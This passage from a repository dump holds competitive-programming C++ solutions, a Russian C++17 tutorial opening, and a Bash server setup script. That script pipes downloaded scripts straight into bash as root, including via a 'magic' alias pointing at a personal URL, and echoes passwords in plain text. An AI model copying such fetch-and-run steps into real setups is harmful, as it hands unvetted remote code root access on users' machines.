(int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n \ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n \n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n \n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n \n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n \n//Igorjan\n//umax\ntemplate<typename T1, typename T2>\nT1 umax(T1& a, T2 b)\n{\n return a < T2(b) ? a = b : a;\n}\n \n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n \n//}}}\n \nint ROUND_UP(int x, int y) // {{{\n{\n return (x + y - 1) / y;\n}\n \nint NON_TOP_MACHINE = 1;\nint NON_TOP_DISK = 1;\nstruct task;\nstruct disk;\nstruct machine;\n \nstruct machine\n{\n int id;\n int p;\n int t = 0;\n \n int get(int sz)\n {\n return ROUND_UP(sz, p);\n }\n \n machine() {}\n};\n \nistream& operator>>(istream& is, machine& m) {\n is >> m.id >> m.p; --m.id;\n return is;\n}\n \nstruct disk\n{\n int id;\n int s;\n int c;\n int used = 0;\n \n int get(int dt)\n {\n return ROUND_UP(dt, s);\n }\n \n disk() {}\n};\n \nistream& operator>>(istream& is, disk& d) {\n is >> d.id >> d.s >> d.c; --d.id;\n return is;\n}\n \ntypedef bitset<10001> bs;\n \nstruct task\n{\n int id;\n int sz;\n int dt;\n int importance = 1;\n int ind = 0;\n \n vector<int> availableMachines;\n \n vector<int> gData;\n vector<int> gTask;\n vector<int> g;\n vector<int> rev;\n bs r;\n \n vector<int> rData;\n vector<int> rTask;\n \n int x = -1;\n int y = -1;\n int z = -1;\n \n int a = -1;\n int b = -1;\n int c = -1;\n int d = -1;\n \n int getDataRead();\n \n void assign(int x, int y, int z);\n \n task() {}\n \n bool operator<(const task& other) const \n {\n return importance < other.importance;\n //return sz > other.sz;\n //return tuple(-sz, -importance) < tuple(-other.sz, 
-other.importance);\n }\n};\n \nistream& operator>>(istream& is, task& t) {\n int nn, x;\n is >> t.id >> t.sz >> t.dt >> nn; --t.id;\n fori(nn)\n {\n is >> x; --x;\n t.availableMachines.pb(x);\n }\n return is;\n}\n \nostream& operator<<(ostream& os, const task& t) {\n os << t.id + 1 << \" \" << t.x << \" \" << t.y + 1 << \" \" << t.z + 1;\n //os << \"Task: [\" << t.id << \" \" << t.sz << \" \" << t.dt << \" \" << t.gData.size() << \" \" << t.gTask.size() << \" \" << t.availableMachines.size() << \"]\";\n return os;\n} // }}}\n \nint c = 4;\n \nvoid shuffleOrder(vector<int>& order, int S)\n{\n int n = SZ(order);\n for (int i = 0; i < n; )\n {\n int step = S;\n shuffle(order.begin() + i, order.begin() + min(n, i + step), rng);\n i += S;\n }\n}\n \nvoid sortOrder(const vector<task>& edges, vector<int>& order, int step)\n{\n function<bool(int, int)> f = [&](const int& a, const int& b) {\n return edges[a] < edges[b];\n };\n //int test = rng() % c;\n //if (test % c == 0)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].sz, edges[a].importance) > tuple(edges[b].sz, edges[b].importance);\n //};\n //}\n //else if (test % c == 1)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance, edges[a].sz) > tuple(edges[b].importance, edges[b].sz);\n //};\n //}\n //else if (test % c == 2)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance, -edges[a].sz) > tuple(edges[b].importance, -edges[b].sz);\n //};\n //}\n //else if (test % c == 3)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance) > tuple(edges[b].importance);\n //};\n //}\n sort(all(order), f);\n shuffleOrder(order, step);\n}\n \n//topsort\n//Returns empty vector if cycle is found\nvi topsort(vector<int>& order, vector<task>& edges, int msz, int step, bool reversed = false)\n{\n int n = edges.size();\n vector<int> ans;\n vector<int> used(n, 0);\n \n if (order.size() == 0)\n {\n order.resize(n);\n 
iota(all(order), 0);\n sortOrder(edges, order, step);\n //if (test % c <= 1)\n //if (rng() % 20 == 0)\n //{\n //vector<int> order2;\n //int C = n / msz;\n //for (int i = 0; i < C; i++)\n //for (int j = i; j < n; j += C)\n //order2.pb(order[j]);\n //order = order2;\n //}\n }\n else\n shuffleOrder(order, step);\n \n if (rng() % 2)\n {\n queue<int> q;\n for (int i: order)\n if (edges[i].ind == 0)\n q.push(i);\n\n while (!q.empty())\n {\n int u = q.front();\n q.pop();\n ans.pb(u);\n used[u] = 1;\n //sortOrder(edges, edges[u].g, step);\n for (const int& v: edges[u].g)\n if (--edges[v].ind == 0)\n q.push(v);\n }\n if (reversed)\n reverse(ans.begin(), ans.end());\n }\n else \n {\n auto dfs = [&](auto dfs, int u) -> void {\n used[u] = 1;\n //sortOrder(edges, edges[u].g, step);\n for (const int& v: edges[u].g)\n if (!used[v])\n dfs(dfs, v);\n used[u] = 2;\n ans.pb(u);\n };\n \n for (int i: order)\n if (!used[i])\n dfs(dfs, i);\n if (!reversed)\n reverse(ans.begin(), ans.end());\n }\n return ans;\n}\n \nvector<disk> disks; // {{{\nvector<machine> machines;\nvector<task> tasks;\n \nint task::getDataRead()\n{\n return disks[z].get(dt);\n}\n \nvoid task::assign(int x, int y, int z)\n{\n this->x = x;\n this->y = y;\n this->z = z;\n \n a = x;\n b = a;\n for (int pred: gData)\n b += tasks[pred].getDataRead();\n c = b + machines[y].get(sz);\n d = c + disks[z].get(dt);\n \n machines[y].t = d;\n disks[z].used += dt;\n}\n \nvoid reset()\n{\n for (auto& t: tasks)\n {\n t.x = t.y = t.z = t.a = t.b = t.c = t.d = 0;\n shuffle(all(t.gData), rng);\n shuffle(all(t.gTask), rng);\n shuffle(all(t.rData), rng);\n shuffle(all(t.rTask), rng);\n shuffle(all(t.rev), rng);\n shuffle(all(t.g), rng);\n t.ind = SZ(t.rev);\n }\n for (auto& d: disks)\n d.used = 0;\n for (auto& m: machines)\n m.t = 0; \n} // }}}\n \nauto run(vector<int>& order) // {{{\n{\n reset();\n for (int tt: order)\n {\n task& t = tasks[tt];\n int time = 0;\n for (int dd: t.gData)\n umax(time, tasks[dd].d);\n \n int e = MOD;\n int 
x;\n int y;\n int ee = MOD;\n int xx;\n int yy;\n for (int M: t.availableMachines)\n {\n auto& m = machines[M];\n int start = max(time, m.t);\n for (int dt: t.gTask)\n umax(start, m.id == tasks[dt].y ? tasks[dt].d : tasks[dt].c);\n \n int cur = start + m.get(t.sz);\n if (cur < e)\n ee = e,\n xx = x,\n yy = y,\n e = cur,\n x = start,\n y = m.id;\n }\n int trash = 3;\n if (ee != MOD && t.importance < trash && rng() % 2)\n e = ee,\n x = xx,\n y = yy;\n \n int eee = MOD;\n int z;\n\n int eeee = MOD;\n int zz;\n for (auto& d: disks)\n if (d.used + t.dt <= d.c)\n {\n int cur = e + d.get(t.dt);\n if (cur < eee)\n eeee = eee,\n zz = z,\n eee = cur,\n z = d.id;\n }\n\n if (eeee != MOD && t.importance < trash && rng() % 2)\n z = zz;\n\n t.assign(x, y, z);\n }\n return tasks;\n} // }}}\n \nint main()\n{\n//{{{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(l);\n tasks.resize(l);\n readln(tasks);\n ints(n);\n machines.resize(n);\n readln(machines);\n ints(m);\n disks.resize(m);\n readln(disks);\n ints(dd);\n fori(dd)\n {\n ints(u, v); --u; --v;\n tasks[v].gData.pb(u);\n tasks[u].rData.pb(v);\n }\n ints(td);\n fori(td)\n {\n ints(u, v); --u; --v;\n tasks[v].gTask.pb(u);\n tasks[u].rTask.pb(v);\n }\n \n sort(all(tasks), [&](const auto& a, const auto& b) { return a.id < b.id; });\n sort(all(disks), [&](const auto& a, const auto& b) { return a.id < b.id; });\n sort(all(machines), [&](const auto& a, const auto& b) { return a.id < b.id; });\n \n for (auto& t: tasks)\n {\n t.g.insert(t.g.end(), all(t.gData));\n t.g.insert(t.g.end(), all(t.gTask));\n sort(all(t.g));\n t.g.resize(unique(all(t.g)) - t.g.begin());\n\n t.rev.insert(t.rev.end(), all(t.rData));\n t.rev.insert(t.rev.end(), all(t.rTask));\n sort(all(t.rev));\n t.rev.resize(unique(all(t.rev)) - t.rev.begin());\n\n if (t.sz > 500)\n {\n vector<pii> temp;\n for (int M: t.availableMachines)\n temp.pb({-machines[M].p, M});\n sort(all(temp));\n while (temp.size() > 1 && -temp.back().first < 10)\n temp.pop_back();\n 
vector<int> nxt;\n for (auto& [_, M]: temp)\n nxt.pb(M);\n t.availableMachines = nxt;\n }\n t.ind = SZ(t.rev);\n }\n vector<int> o;\n auto order = topsort(o, tasks, machines.size(), 1);\n reset();\n for (int tt: order)\n {\n task& t = tasks[tt];\n for (int dep: t.rData)\n {\n t.r[dep] = true;\n t.r |= tasks[dep].r;\n }\n \n for (int dep: t.rTask)\n {\n t.r[dep] = true;\n t.r |= tasks[dep].r;\n }\n \n t.importance = t.r.count();\n }\n \n auto start = clock();\n // }}}\n#ifdef ONLINE_JUDGE\n auto TL = 14.6;\n#else\n auto TL = 3.;\n#endif\n auto makespan = MOD;\n vector<task> answer;\n vector<vector<int>> current;\n int test = 0;\n while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n //while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n {\n //if (test % 2 == 0)\n //{\n o.clear();\n o.resize(0);\n //}\n //run(1);\n int step = rng() % 77 + 1;\n auto ans = topsort(o, tasks, machines.size(), step, true);\n run(ans);\n int cur = 0;\n for (auto& t: tasks)\n umax(cur, t.d);\n if (cur < makespan)\n makespan = cur,\n current.pb(o),\n answer = vector<task>(all(tasks));\n ++test;\n }\n if (false) {\n reverse(all(current));\n current.resize(min(SZ(current), 10));\n int test2 = 0;\n while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n {\n int step = rng() % 100 + 1;\n int index = rng() % SZ(current);\n auto ttt = current[index];\n auto ans = topsort(ttt, tasks, machines.size(), step, true);\n run(ans);\n int cur = 0;\n for (auto& t: tasks)\n umax(cur, t.d);\n if (cur < makespan)\n makespan = cur,\n current[index] = ttt,\n answer = vector<task>(all(tasks));\n ++test2;\n }\n }\n writeln(answer);\n cerr << makespan << \" \" << test << endl;\n return 0;\n}\n \n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto 
it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5226514935493469, "alphanum_fraction": 0.5306922793388367, "avg_line_length": 26.711956024169922, "blob_id": "6f8b923ebda4f34c9364f23a5b989dc52d41b338", "content_id": "8f2a1759fc5c5bf304880cb1fee8a145a5a44748", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5099, "license_type": "no_license", "max_line_length": 169, "num_lines": 184, "path": "/scripts/adduser.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nsource /etc/os-release\n\nensureCommandExists () {\n pack=$2\n if [ ! \"$pack\" ]; then\n pack=$1\n fi\n\n echo \"Installing $1...\"\n if ! [ -x \"$(command -v $1)\" ]; then\n $installer $pack\n else\n echo \"Found $1\"\n fi\n}\n\nif [ $EUID -ne 0 ]; then\n echo \"Only root can run this script\"\n exit 1\nfi\n\nif [ -x \"$(command -v pacman)\" ]; then\n installer=\"pacman -Sy --noconfirm\"\n isArch=\"isArch\"\nelse\n installer=\"apt-get install -y\"\nfi\n\nfunction usage {\n cat << END\nusage: adduser.sh\n -u | --user <username>\n -p | --password <password>\n -s | --server <server_name>\n -k | --sshkey <sshkey>\n -n | --node\n -d | --docker\n -h | --help\n -f | --force\nEND\n exit 0\n}\n\nOPTS=`getopt -o hfndmu:p:s:k: -l help,force,node,docker,minimal,username:,password:,server:,sshkey:,packages -- \"$@\"`\nif [ $? 
!= 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n -h | --help ) usage ;shift;;\n -f | --force ) force=true ;shift;;\n -n | --node ) needsNode=true ;shift;;\n -d | --docker ) needsDocker=true ;shift;;\n -m | --minimal ) minimal=true ;shift;;\n\n -u | --username ) user=$2 ;shift 2;;\n -p | --password ) password=$2 ;shift 2;;\n -s | --server ) server=$2 ;shift 2;;\n -k | --sshkey ) sshkey=$2 ;shift 2;;\n --packages ) packages=$2 ;shift 2;;\n\n -- ) shift; break;;\n esac\ndone\n\necho \"Installer: $installer\"\n\nif [ \"$server\" ]; then\n server=\"$server: \"\nelse\n server=\"$HOSTNAME: \"\nfi\n\nensureCommandExists \"curl\"\n\nif [ \"$packages\" ]; then\n for package in \"$packages\"; do\n $installer $package\n done\nfi\n\nif [ \"$minimal\" ]; then\n ensureCommandExists \"zsh\"\n ensureCommandExists \"sudo\"\n ensureCommandExists \"vim\"\n ensureCommandExists \"git\"\n ensureCommandExists \"htop\"\n ensureCommandExists \"ifconfig\" \"net-tools\"\nfi\n\nif [ ! `getent group sudo 2>/dev/null` ]; then\n echo \"Creating group sudo...\"\n groupadd sudo\n sed -i.bak \"s/\\# %sudo/%sudo/g\" /etc/sudoers\nfi\n\nif [ \"$user\" ]; then\n home=\"/home/$user\"\n if [ \"$user\" == \"root\" ]; then\n home=\"/root\"\n fi\n\n if [ ! `getent passwd $user 2>/dev/null` ]; then\n ensureCommandExists \"zsh\"\n if [ \"$password\" ]; then\n echo \"Creating user '$user' with password '$password'...\"\n useradd -m -g sudo -p $(openssl passwd -1 $password) -s `which zsh` $user\n else\n echo \"Creating user '$user'...\"\n useradd -m -g sudo -s `which zsh` $user\n fi\n else\n chsh -s `which zsh` $user\n usermod -aG sudo $user\n fi\n\n zshrc=\"$home/.zshrc\"\n if [ ! 
-f $zshrc ] || [ \"$force\" ]; then\n echo \"Downloading .zshrc (Prompt: '$server')...\"\n curl https://raw.githubusercontent.com/Igorjan94/x/master/.zshrcMinimal 2>/dev/null | sed \"s/Server 79: /$server/g\" | sed \"s:/usr/bin/vim:`which vim`:g\" > $zshrc\n echo \"alias sudo='sudo -S'\" >> $zshrc\n echo \"alias magic='curl \\\"https://igorjan94.ru/adduser.sh\\\" 2&>/dev/null | bash -s -- '\" >> $zshrc\n fi\n\n if [ \"$sshkey\" ]; then\n echo \"Appending ssh key to authorized_keys...\"\n mkdir -p \"$home/.ssh\"\n keys_file=\"$home/.ssh/authorized_keys\"\n if [ ! -f $keys_file ]; then\n touch \"$keys_file\"\n fi\n echo \"$sshkey\" >> \"$keys_file\"\n fi\nfi\n\n#node\nif [ \"$needsNode\" ]; then\n echo \"Installing nodejs...\"\n if ! [ -x \"$(command -v node)\" ]; then\n if [ \"$isArch\" ]; then\n pacman -Sy --noconfirm nodejs npm\n else\n curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -\n apt-get install -y nodejs\n fi\n else\n echo \"Found node\"\n fi\nfi\n\n#docker\nif [ \"$needsDocker\" ]; then\n echo \"Installing docker...\"\n if ! 
[ -x \"$(command -v docker)\" ]; then\n if [ \"$isArch\" ]; then\n pacman -Sy --noconfirm docker docker-compose\n else\n apt-get update\n apt-get install -y apt-transport-https ca-certificates curl gnupg2 software-properties-common\n curl -fsSL https://download.docker.com/linux/$ID/gpg | apt-key add -\n add-apt-repository \\\n \"deb [arch=amd64] https://download.docker.com/linux/$ID \\\n $(lsb_release -cs) \\\n stable\"\n apt-get update\n apt-get install -y docker-ce\n curl -L https://github.com/docker/compose/releases/download/1.24.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose\n chmod +x /usr/local/bin/docker-compose\n fi\n if [ \"$user\" ]; then\n echo \"Adding user '$user' in docker group...\"\n usermod -aG docker \"$user\"\n fi \n\n echo \"Starting and enabling daemon...\"\n systemctl start docker\n systemctl enable docker\n else\n echo \"Found docker\"\n fi\nfi\n" }, { "alpha_fraction": 0.347457617521286, "alphanum_fraction": 0.3910411596298218, "avg_line_length": 20, "blob_id": "8955b5a91f6f0841fc8135b635b02b748db21bf9", "content_id": "9cc309e2511380299bd49aedd099d86f6ef132e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 109, "num_lines": 118, "path": "/2013/2013FBHC/count.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <algorithm>\n#include <cstdlib>\n#include <string>\n#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <iterator>\n#include <queue>\n\nusing namespace std;\n\nint n, k, l, classes;\nvector<int> s(400001), c(400001), c1(400001), head(400001), a(400001), a1(400001), temp(400001), a_1(400002);\n\ntemplate <class T>\nvoid writeln(vector<T> &a)\n{\n for (int i = 0; i < n; i++)\n printf(\"%d \", a[i]);\n// copy(a.begin(), a.end(), ostream_iterator<T>(cout, \" \"));\n printf(\"\\n\");\n}\n\nvoid read()\n{\n int i = 0;\n char d;\n while (true)\n {\n scanf(\"%c\", 
&d);\n if (d == '\\n')\n break;\n s[i] = d - 'a' + 1;\n a[i] = i++;\n }\n s[i] = 0;\n a[i] = i++;\n n = i;\n}\n\nvoid radix(vector<int> &a)\n{\n for (int i = 0; i < n; i++)\n head[s[a[i]] + 1]++;\n head[0] = 0;\n for (int i = 1; i < 28; i++)\n head[i] += head[i - 1];\n for (int i = 0; i < n; i++)\n temp[head[s[a[i]]]++] = a[i];\n c[a[0]] = 0;\n classes = 1;\n a = temp;\n for (int i = 1; i < n; i++)\n {\n if (s[a[i]] != s[a[i - 1]])\n classes++;\n c[a[i]] = classes - 1;\n }\n}\n\nvoid suffix_array(vector<int> &s)\n{\n /*c.resize(n);\n head.resize(n);\n a.resize(n);\n a1.resize(n);\n c1.resize(n);\n temp.resize(n);*/\n radix(a);\n for (int l = 1; l < n; l *= 2)\n {\n head.clear();\n head.resize(classes, 0);\n for (int i = 0; i < n; i++)\n head[c[a1[i] = (a[i] - l + n) % n]]++;\n for (int i = 1; i < classes; i++)\n head[i] += head[i - 1];\n for (int i = n - 1; i >= 0; i--)\n a[--head[c[a1[i]]]] = a1[i];\n classes = 1;\n c1[a[0]] = 0;\n for (int i = 1; i < n; i++)\n {\n if (c[a[i]] != c[a[i - 1]] || c[(a[i] + l) % n] != c[(a[i - 1] + l) % n])\n classes++;\n c1[a[i]] = classes - 1;\n }\n c = c1;\n }\n}\n\nint main()\n{\n// freopen(\"count.out\", \"w+\", stdout);\n // freopen(\"count.in\", \"r\", stdin);\n read();\n if (n == 2)\n {\n printf(\"1\\n\");\n return 0;\n }\n suffix_array(s);\n int z = 0;\n long long ans = 0;\n for (int i = 0; i < n; i++)\n a_1[a[i]] = i;\n int i;\n for (int j = 0; j < n; j++)\n {\n i = a_1[j];\n for (;s[a[i] + z] == s[a[(i + 1) % n] + z]; z++);\n ans = ans + n - 1 - a[i] - z;\n if (z > 0)\n z--;\n }\n printf(\"%I64d\\n\", ans);\n return 0;\n}\n" }, { "alpha_fraction": 0.45205992460250854, "alphanum_fraction": 0.4599250853061676, "avg_line_length": 30.41176414489746, "blob_id": "109400c6af8242d7c7ccc26b3ba2ceb76b93fff6", "content_id": "953a1f9e78a05e1633eb1bb3f394db31cc3c0cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2670, "license_type": "no_license", "max_line_length": 928, 
"num_lines": 85, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.24/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <map>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector<int> used;\nstring FILENAME = \"homo\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n multimap<int, int> q;\n set<int> s;\n char c, d;\n int f = 0;\n int x;\n multimap<int, int>::iterator it;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%c%c%c%c%c%c%c%d\\n\", &c, &c, &c, &c, &c, &c, &d, &x);\n if (c == 't')\n {\n s.insert(x);\n if (q.count(x) == 1)\n f++;\n q.insert(make_pair(x, i));\n }\n else\n {\n int t = q.count(x);\n if (t == 1)\n s.erase(x);\n if (t == 2)\n f--;\n it = q.find(x);\n if (it != q.end())\n q.erase(it);\n }\n //printf(\"%d %d \", q.size(), s.size());\n if (q.size() <= 1)\n printf(\"neither\\n\"); else\n if (f && s.size() > 1)\n printf(\"both\\n\"); else\n if (f)\n printf(\"homo\\n\"); else\n printf(\"hetero\\n\");\n }\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.43383297324180603, "alphanum_fraction": 0.4471092224121094, "avg_line_length": 30.554054260253906, "blob_id": "87e5586a21513dcb8d0d914567673b71d02c6d22", "content_id": "6293edf5f0db58b8c34805877f3dbdadbb7bd9fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2335, "license_type": "no_license", "max_line_length": 928, "num_lines": 74, "path": "/CodeForce/0316/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b, c;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int 
c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n char c;\n int ans = 0;\n long long ss = 1;\n bool flag = false, flag2 = false;\n set<char> s;\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == '\\n')\n break;\n else\n if (c >= '0' && c <= '9')\n flag2 = true;\n else\n if (c == '?')\n {\n if (!flag2)\n ss *= 9; else\n ans++;\n }\n else\n {\n s.insert(c);\n if (!flag2)\n flag = true;\n }\n flag2 = true;\n }\n //printf(\"%d\\n\", s.size());\n for (int i = 0; i < s.size() - flag; i++)\n ss *= (10 - i - flag);\n if (flag)\n ss *= 9;\n cout << ss;\n// printf(\"1\");\n //ans += s.size();\n for (int i = 0; i < ans; i++)\n printf(\"0\");\n printf(\"\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.36503496766090393, "alphanum_fraction": 0.39580419659614563, "avg_line_length": 18.351350784301758, "blob_id": "9bc58abb73dbfd69b79032626f6ffb8fcca5a073", "content_id": "2b22e439dca7267a691ef14f4c553476f0875dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 715, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": 
"/trains/neerc/neerc.ifmo.ru.train.2014.10.11/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nstring s1, s2, t1, t2;\nbool used[3000];\nvoid run()\n{\n cin >> s1 >> s2 >> t1 >> t2;\n int n = s1.size();\n for (int i = 0; i < n; ++i){\n char ch = s1[i];\n bool f = false;\n for (int j = 0; j < n; ++j){\n if (t1[j] == ch && s2[n - i - 1] == t2[n - j - 1] && !used[j]){\n f = true;\n used[j] = true;\n break;\n }\n }\n if (!f){\n cout << \"No\";\n return;\n }\n }\n cout << \"Yes\";\n}\n \nint main()\n{\n freopen(\"enchanted.in\", \"r\", stdin);\n freopen(\"enchanted.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.5799015164375305, "alphanum_fraction": 0.6090328097343445, "avg_line_length": 21.935096740722656, "blob_id": "5e5a9b29dd7e3c559fe8caed61c55bb58ba1e0ce", "content_id": "97aab2154ed733cffcb802310ae902bb5e57e0e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12297, "license_type": "no_license", "max_line_length": 277, "num_lines": 416, "path": "/CodeForce/cpp17tricks/cpp17rus.md", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "C++17 уже [доступен](http://codeforces.com/blog/entry/57646) на codeforces, сообщество [хочет](http://codeforces.com/blog/entry/15643?#comment-413401) новую версию [C++ tricks](http://codeforces.com/blog/entry/15643), которую написал [user:Swift,2018-02-13], так что, начнем! \nDisclaimer: Я сделал всего лишь немного примеров новых фич, которые по моему мнению относятся к спортивному программированию. 
Если у Вас есть примеры лучше или Вам что-то непонятно, или нужно больше объяснений каких-то фич $---$ пишите в комментах)\n\n### Fold expressions (Свертки)\n\n* Я думаю все знают, что такое reduce и свертка, но все-таки приведу пример из c++11:\n\n```\nvector<int> v = {1, 3, 5, 7};\nint res = accumulate(v.begin(), v.end(), 0, [](int a, int b) { return a + b; });\ncout << res; // 16\n```\n\n* Начиная с C++17 есть поддержка свертки для шаблонного списка со следующим синтаксисом:\n\n```\n(pack op ...)\n(... op pack)\n(pack op ... op init)\n(init op ... op pack)\n```\n\n* Для примера напишем функцию, которая принимает переменное число аргументов и считает их сумму.\n\n[cut]\n\nДо С++17 мы не могли этого сделать без явной передачи первого аргумента:\n\n```\n//C++14\nauto Sum()\n{\n return 0;\n}\n\ntemplate<typename Arg, typename... Args>\nauto Sum(Arg first, Args... rest)\n{\n return first + Sum(rest...);\n}\n\ncout << Sum(1, 2, 3, 4, 5); // 15\n```\n\n```\n//C++17\ntemplate<typename... Args>\nauto Func(Args... args)\n{\n return (args + ...);\n}\n\ncout << Func(1, 2, 3, 4, 5); // 15\n```\n\n* Это особенно полезно, когда мы в качестве `op` используем запятую:\n\n```\n// C++17\ntemplate<typename T, typename... Args>\nvoid pushToVector(vector<T>& v, Args&&... args)\n{\n (v.push_back(forward<Args>(args)), ...);\n //Этот код раскрывается в последовательность выражений через запятую:\n // 